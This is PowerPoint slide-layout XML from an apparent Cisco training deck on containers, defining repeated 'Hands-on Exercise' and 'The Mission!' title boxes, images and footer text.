          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05B2E071-87AA-2944-BFC9-B34F7C96CED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17230" y="3959641"/>
            <a:ext cx="1574983" cy="1072618"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1E7E6FD-2281-B941-85E4-12DD2303285B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="329184" y="239986"/>
            <a:ext cx="7179823" cy="715581"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="4050" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hands-on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4050" b="0" i="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Exercise …</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4050" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74F15EBC-0A3B-384C-A318-FE4463EE58C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56114" y="1597039"/>
            <a:ext cx="4073237" cy="2703601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F92A122-F59E-2149-A6EC-A06ADF0658CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6648913" y="4778344"/>
            <a:ext cx="2207942" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ALL ABOUT CONTAINERS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Connector 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8ECB6CF1-430E-B94D-893E-83FAC898546B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6707458" y="4772813"/>
            <a:ext cx="182322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0083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CI Mission Break">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618CC10-7F93-7A41-8993-E9C1B07FFE6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63057"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AEE6027-B3CE-2649-BB30-A6CB8DFB6CBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="329184" y="239986"/>
            <a:ext cx="7179823" cy="1269578"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Get your hands dirty with …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4050" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The Mission!</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4050" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FE8B9CC-DA30-724D-88D8-CB0C12E21A5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1297007"/>
            <a:ext cx="2409443" cy="2531836"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05B2E071-87AA-2944-BFC9-B34F7C96CED5}"/>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17230" y="3959641"/>
            <a:ext cx="1574983" cy="1072618"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{475DBA01-A720-5249-92E7-6CD20F43871E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6648913" y="4778344"/>
            <a:ext cx="2207942" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ALL ABOUT CONTAINERS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80BFE694-CB85-C949-90B8-23D1502D0A95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6707458" y="4772813"/>
            <a:ext cx="182322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0570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DNA Mission Brea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A6F419-F710-FA43-8CAB-B4E1F64DE05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B1E7E6FD-2281-B941-85E4-12DD2303285B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="329184" y="239986"/>
            <a:ext cx="7179823" cy="715581"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="4050" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hands-on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4050" b="0" i="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Exercise …</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4050" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74F15EBC-0A3B-384C-A318-FE4463EE58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56114" y="1597039"/>
            <a:ext cx="4073237" cy="2703601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDCF34CE-2DE1-FF41-896D-B3AE883AA20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17230" y="3959641"/>
            <a:ext cx="1574983" cy="1072618"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A736EB88-8AEA-FD4A-B99F-FBF9132B9E7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6648913" y="4778344"/>
            <a:ext cx="2207942" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ALL ABOUT CONTAINERS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Connector 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A90EB5A3-2F34-6549-82A8-0A0C2F4EC495}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6707458" y="4772813"/>
            <a:ext cx="182322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2722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NA Mission Brea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A6F419-F710-FA43-8CAB-B4E1F64DE05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B1E7E6FD-2281-B941-85E4-12DD2303285B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="329184" y="239986"/>
            <a:ext cx="7179823" cy="1269578"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Get your hands dirty with …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4050" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The Mission!</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4050" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74F15EBC-0A3B-384C-A318-FE4463EE58C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1297007"/>
            <a:ext cx="2409443" cy="2531836"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDCF34CE-2DE1-FF41-896D-B3AE883AA20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17230" y="3959641"/>
            <a:ext cx="1574983" cy="1072618"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3F5E16A-FE9A-BF48-82F5-37C715B12708}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6648913" y="4778344"/>
            <a:ext cx="2207942" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ALL ABOUT CONTAINERS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Connector 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04385922-5475-094F-9F97-8FF196EC427E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6707458" y="4772813"/>
            <a:ext cx="182322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67883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C Mission Brea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85D8A5-BEA8-B048-B62D-A3F9AD8EB32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9109363" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91C1B048-465C-4442-B509-10E275175B9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17230" y="3959641"/>
            <a:ext cx="1574983" cy="1072618"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1E7E6FD-2281-B941-85E4-12DD2303285B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="329184" y="239986"/>
            <a:ext cx="7179823" cy="715581"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="4050" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hands-on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4050" b="0" i="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Exercise …</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4050" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74F15EBC-0A3B-384C-A318-FE4463EE58C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56114" y="1597039"/>
            <a:ext cx="4073237" cy="2703601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DEDB633-A1FF-7F4B-A878-34195CDBC71A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6648913" y="4778344"/>
            <a:ext cx="2207942" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ALL ABOUT CONTAINERS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Connector 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E53DEB9B-42CD-A146-A7D8-61B35C1EC108}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6707458" y="4772813"/>
            <a:ext cx="182322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00818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C Mission Brea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85D8A5-BEA8-B048-B62D-A3F9AD8EB32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9109363" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{359C5C59-6138-724F-B9E0-D0012D741103}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="329184" y="239986"/>
            <a:ext cx="7179823" cy="1269578"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Get your hands dirty with …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4050" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The Mission!</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4050" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98714426-CE39-E844-A586-4769F10EA22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1297007"/>
            <a:ext cx="2409443" cy="2531836"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91C1B048-465C-4442-B509-10E275175B9B}"/>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17230" y="3959641"/>
            <a:ext cx="1574983" cy="1072618"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1797E92-5125-EF40-8EF0-150B9A4EA100}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6648913" y="4778344"/>
            <a:ext cx="2207942" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
